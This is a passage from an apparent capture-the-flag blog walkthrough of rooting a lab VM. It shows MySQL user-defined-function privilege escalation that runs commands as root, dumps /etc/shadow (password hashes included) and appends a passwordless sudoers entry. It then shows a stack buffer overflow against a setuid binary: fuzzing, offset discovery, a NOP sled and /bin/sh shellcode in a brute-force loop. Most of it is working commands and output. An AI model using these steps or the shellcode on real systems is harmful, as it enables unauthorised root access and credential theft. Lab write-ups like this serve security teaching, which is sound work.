proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
[email protected]:~$

MYSQL USER DEFINED FUNCTIONS PRIVILEGE ESCALATION

Now that we have a full SSH shell to the target, the next route to root is privilege escalation. Since I had the local root password from the SQL DB and a full SSH shell, I decided the quickest way would be to use a user-defined function via the MySQL UDF exploit.

gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p


use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;


mysql> SELECT do_system('cat /etc/shadow');
+------------------------------+
| do_system('cat /etc/shadow') |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('cat /etc/shadow > /tmp/shadow');
+--------------------------------------------+
| do_system('cat /etc/shadow > /tmp/shadow') |
+--------------------------------------------+
|                                          0 |
+--------------------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('chmod 777 /tmp/shadow');
+------------------------------------+
| do_system('chmod 777 /tmp/shadow') |
+------------------------------------+
|                                  0 |
+------------------------------------+
1 row in set (0.02 sec)


[email protected]:/tmp$ cat shadow
root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16652:0:99999:7:::
usbmux:*:16652:0:99999:7:::
dnsmasq:*:16652:0:99999:7:::
avahi-autoipd:*:16652:0:99999:7:::
kernoops:*:16652:0:99999:7:::
rtkit:*:16652:0:99999:7:::
saned:*:16652:0:99999:7:::
whoopsie:*:16652:0:99999:7:::
speech-dispatcher:!:16652:0:99999:7:::
avahi:*:16652:0:99999:7:::
lightdm:*:16652:0:99999:7:::
colord:*:16652:0:99999:7:::
hplip:*:16652:0:99999:7:::
pulse:*:16652:0:99999:7:::
smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::
mysql:!:16695:0:99999:7:::
sshd:*:16696:0:99999:7:::



mysql> SELECT do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers');
+---------------------------------------------------------------+
| do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers') |
+---------------------------------------------------------------+
|                                                             0 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>

GAME OVER!

Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.

[email protected]:/tmp$ sudo su
[email protected]:/tmp# whoami
root
[email protected]:/tmp# cd /root
[email protected]:~# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
[email protected]:~# cat Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
[email protected]:~#

GOING THE EXTRA MILE

[email protected]:~# ssh [email protected]
The authenticity of host '192.168.1.138 (192.168.1.138)' can't be established.
ECDSA key fingerprint is f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.138' (ECDSA) to the list of known hosts.

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

261 packages can be updated.
128 updates are security updates.

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ cd ./
[email protected]:~$ cd /
[email protected]:/$ ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  SECRET  srv  sys  tmp  usr  var  vmlinuz
[email protected]:/$ cd SECRET
[email protected]:/SECRET$ ls
door1  door2  door3
[email protected]:/SECRET$ ls -lh
total 12K
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door1
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door2
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door3
[email protected]:/SECRET$ cd door3
[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ls -lh
total 8.0K
-rwsr-xr-x 1 root root 5.1K Sep 22 13:01 file
[email protected]:/SECRET/door3$ ./file
Syntax: ./file < input string>

BUFFER OVERFLOW FUZZING

[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x2048'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x200'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x150'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x170'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x171'`
Illegal instruction (core dumped)

FINDING THE OFFSET

[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 41376641
[*] Exact match at offset 171
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 36664135
[*] Exact match at offset 167
[email protected]:~#

CHECKING FOR ASLR

[email protected]:/SECRET/door1$ ls
file
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb77b9000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f2000)
	/lib/ld-linux.so.2 (0xb77bb000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7708000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7541000)
	/lib/ld-linux.so.2 (0xb770a000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7740000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7579000)
	/lib/ld-linux.so.2 (0xb7742000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb773b000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7574000)
	/lib/ld-linux.so.2 (0xb773d000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7783000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75bc000)
	/lib/ld-linux.so.2 (0xb7785000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7764000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759d000)
	/lib/ld-linux.so.2 (0xb7766000)
[email protected]:/SECRET/door1$ 



[email protected]:/tmp$ cat test.c
#include 

int main()
{
    int a;
    printf("%p\n", &a);
    return 0;
}

[email protected]:/tmp$ ls
exploit.poy  exploit.py  test.c
[email protected]:/tmp$ gcc test.c -o test
[email protected]:/tmp$ ./test
0xbfc0ad2c
[email protected]:/tmp$ ./test
0xbfa93a1c
[email protected]:/tmp$ ./test
0xbff82e3c

DEBUGGING

[email protected]:/SECRET/door3$ gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x171, "B"x4, "C"x2000'`
Starting program: /SECRET/door3/file `perl -e 'print "A"x171, "B"x4, "C"x2000'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) disass main
Dump of assembler code for function main:
   0x0804845d <+0>:	push   %ebp
   0x0804845e <+1>:	mov    %esp,%ebp
   0x08048460 <+3>:	and    $0xfffffff0,%esp
   0x08048463 <+6>:	sub    $0xb0,%esp
   0x08048469 <+12>:	cmpl   $0x1,0x8(%ebp)
   0x0804846d <+16>:	jg     0x8048490 <main+51>
   0x0804846f <+18>:	mov    0xc(%ebp),%eax
   0x08048472 <+21>:	mov    (%eax),%eax
   0x08048474 <+23>:	mov    %eax,0x4(%esp)
   0x08048478 <+27>:	movl   $0x8048540,(%esp)
   0x0804847f <+34>:	call   0x8048310 <[email protected]>
   0x08048484 <+39>:	movl   $0x0,(%esp)
   0x0804848b <+46>:	call   0x8048340 <[email protected]>
   0x08048490 <+51>:	mov    0xc(%ebp),%eax
   0x08048493 <+54>:	add    $0x4,%eax
   0x08048496 <+57>:	mov    (%eax),%eax
   0x08048498 <+59>:	mov    %eax,0x4(%esp)
   0x0804849c <+63>:	lea    0x11(%esp),%eax
   0x080484a0 <+67>:	mov    %eax,(%esp)
   0x080484a3 <+70>:	call   0x8048320 <[email protected]>
   0x080484a8 <+75>:	mov    $0x0,%eax
   0x080484ad <+80>:	leave  
   0x080484ae <+81>:	ret    
End of assembler dump.
(gdb) info reg
eax            0x0	0
ecx            0xbfe311f0	-1075637776
edx            0xbfe2fb28	-1075643608
ebx            0xb76e2000	-1217519616
esp            0xbfe2f360	0xbfe2f360
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10202	[ IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) 
</[email protected]></[email protected]></[email protected]></main+51>

FINDING A GOOD PLACE FOR OUR RETURN ADDRESS

(gdb) r `perl -e 'print "A"x171, "B"x4, "\x90"x4000'`

(gdb) x/2500x $esp
0xbf92eaf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eba0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebe0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eca0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ece0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed70:	0x90909090	0x90909090	0x90909090	0x90909090

CONSTRUCTING OUR BUFFER

JUMP ADDRESS = 0xbf92eb80
LITTLE ENDIAN = \x80\xeb\x92\xbf

OFFSET = 171
JMP = \x80\xeb\x92\xbf
NOOP = \x90*2000
SHELLCODE = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

BUFFER = OFFSET + JMP + NOOP + SHELLCODE

EXPLOITATION

[email protected]:/SECRET/door3$ for a in {1..1000}; do ./file `perl -e 'print "A"x171, "\x80\xeb\x92\xbf", "\x90"x2000', "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"`; done;Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# whoami
root

Questions? Comments? Send to @CrowdShield on Twitter.. l8rz!

January 17, 2016 CTF's, Hacking Tutorials, Uncategorized No comments yet
Products
Recent Posts
Recent Comments
    Archives
    Categories
    Meta